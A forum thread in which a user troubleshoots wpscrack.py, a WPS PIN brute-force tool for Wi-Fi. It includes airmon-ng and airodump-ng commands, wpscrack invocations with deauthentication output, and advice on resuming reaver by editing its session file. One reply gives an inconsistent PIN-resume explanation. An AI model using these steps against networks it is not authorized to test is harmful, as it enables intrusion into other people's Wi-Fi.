
Thread: =WPSCRACK Thread=

  1. #1
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    11

    =WPSCRACK Thread=

    Hello, after a quick search I don't see any thread about WPSCRACK, so I made one for this tool.
    I'm a Linux newbie, but have made a few tries on BT.

    Here is my problem / bug. I did this:

    airmon-ng start wlan0
    wlan0 Realtek RTL8187L rtl8187 - [phy0] (monitor mode enabled on mon0)

    airodump-ng mon0 -c 1

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    XX:1B:5E:B5:XX.XX -54 93 2079 37 0 1 54e WPA2 CCMP PSK ESSSID

    BSSID STATION PWR Rate Lost Frames Probe

    XX:1B:5E:B5:XX:XX YY:E0:C5:04:YY:YY 0 -65 0 - 1 0 8

    (I got association, and the AP is WPS (tried with reaver & FERN))

    So I start the attack on it:

    ./wpscrack.py --iface=mon0 --client YY:E0:C5:04:YY:YY --bssid XX:1B:5E:B5:XX:XX --ssid ESSSID --dh 0 -v

    and I got this error:

    WARNING: No route found for IPv6 destination :: (no default route?)
    sniffer started
    Exception in thread Thread-1:
    Traceback (most recent call last):
    File "/usr/lib/python2.6/threading.py", line 532, in __bootstrap_inner
    self.run()
    File "/usr/lib/python2.6/threading.py", line 484, in run
    self.__target(*self.__args, **self.__kwargs)
    File "./wpscrack.py", line 516, in sniffer
    sniff(store=0, stop_filter=lambda x: self.sniffer_filter(x))
    File "/usr/lib/pymodules/python2.6/scapy/sendrecv.py", line 534, in sniff
    s = L2socket(type=ETH_P_ALL, *arg, **karg)
    TypeError: __init__() got an unexpected keyword argument 'stop_filter'

    ------------------- attempt #1
    Trying 00000000
    -> 802.11 deauthentication
    -> 802.11 authentication request
    TIMEOUT!!
    -> 802.11 deauthentication
    attempt took 5.062 seconds
    ------------------- attempt #2
    Trying 00000000
    -> 802.11 deauthentication
    -> 802.11 authentication request
    TIMEOUT!!
    -> 802.11 deauthentication
    attempt took 5.054 seconds


    This attack works with fern & reaver, but I can't resume manually,
    and their auto save doesn't work fine here (works 1 time, at the 2nd stop the attack restarts from the beginning .... )

    Does anyone have an idea where the problem comes from?

    wpscrack.py file is copied in the home folder
    permissions: owner: root
    access: read & write
    group: root
    access: read & write
    others
    access: read & write
    execute: allow executing file as program

    (Sorry, I'm a newbie on Linux, all help or ideas are welcome here)

  2. #2
    Good friend of the forums zimmaro
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Re: =WPSCRACK Thread=

    Hi,
    these 2 links helped ME to solve it on my bt5-r3 ((many thanks to the authors))
    For a good scapy install..... scapy 2.2.0:

    http://trac.secdev.org/scapy/ticket/771 (This is perhaps not needed .. I do not know) for cert.py


    For wpscrack.py...:

    http://www.hack4fun.eu/2012/01/reaver-wps-wpscrack/ # translated from Czech


    This is my bt5-r3:

    root@bt:~/wpscrack# ./wpscrack.py --help
    Usage: wpscrack.py --iface=IFACE --client=CLIENT_MAC --bssid=BSSID --ssid=SSID [optional arguments]

    Options:
    -h, --help show this help message and exit
    -i IFACE, --iface=IFACE
    network interface (monitor mode)
    -c CLIENT_MAC, --client=CLIENT_MAC
    MAC of client interface
    -b BSSID, --bssid=BSSID
    MAC of AP (BSSID)
    -s SSID, --ssid=SSID SSID of AP (ESSID)
    --dh=DH_SECRET diffie-hellman secret number
    -t TIMEOUT, --timeout=TIMEOUT
    timemout in seconds
    -p START_PIN, --pin=START_PIN
    start pin for brute force
    -v, --verbose verbose

    root@bt:~/wpscrack# ./wpscrack.py --iface=mon0 --client B8:xF:6x:AC:xx:02 --bssid 00:1x:6x:A6:Ax:04 --ssid Alice-78x9xxx4 --dh 0 -v
    sniffer started
    ------------------- attempt #1
    Trying 00000000
    -> 802.11 deauthentication
    -> 802.11 authentication request
    TIMEOUT!!
    -> 802.11 deauthentication
    attempt took 5.131 seconds
    ------------------- attempt #2
    Trying 00000000
    -> 802.11 deauthentication
    -> 802.11 authentication request
    TIMEOUT!!
    -> 802.11 deauthentication
    attempt took 5.060 seconds
    ------------------- attempt #3
    Trying 00000001
    -> 802.11 deauthentication
    -> 802.11 authentication request
    .............................
    ..............................................
    .................................................. ............
    bye

  3. #3
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Re: =WPSCRACK Thread=

    To me it feels like reinventing the wheel.. if you really like to crack WPS.. reaver is the original tool and fully customizable. Yes, you can start from any pin you want. You just need to edit the db file (.wpc) located here:

    /usr/local/etc/reaver/AAAAAAAA.wpc


    If you like to crack WPS in a fully automated way then you can use the wifite tool located here:
    root@bt:/pentest/wireless/wifite# (in BT5 R3)

    Hope this helps.

  4. #4
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    11

    Re: =WPSCRACK Thread=

    I have found the reaver folder:
    usr / local / etc / reaver

    I have the file named 84XXXXXXX8.wpc

    but I have all the tried pins in it;

    If I put a pin like 7400 and save, does reaver resume at 7400??
    Or retry all except 7400?

    I have retried my network testing, I'm at 25.36% (36h running)
    and don't really want to restart from 0 ....
    Last edited by flatounet; 10-11-2012 at 05:32 AM.

  5. #5
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Re: =WPSCRACK Thread=

    Please look here:
    http://code.google.com/p/reaver-wps/issues/list

    Troll through this list and you will find your answer. This is how I found answers to my queries.

  6. #6
    Junior Member
    Join Date
    Jun 2011
    Location
    UK
    Posts
    45

    Re: =WPSCRACK Thread=

    Originally posted by flatounet:
    I have found the reaver folder:
    usr / local / etc / reaver

    I have the file named 84XXXXXXX8.wpc

    but I have all the tried pins in it;

    If I put a pin like 7400 and save, does reaver resume at 7400??
    Or retry all except 7400?

    I have retried my network testing, I'm at 25.36% (36h running)
    and don't really want to restart from 0 ....

    If you want to restart reaver from 7400 you will have to edit the file and put 7405 at the top and save it; reaver will then restart from 7004 7005 7006 7007 and so on.
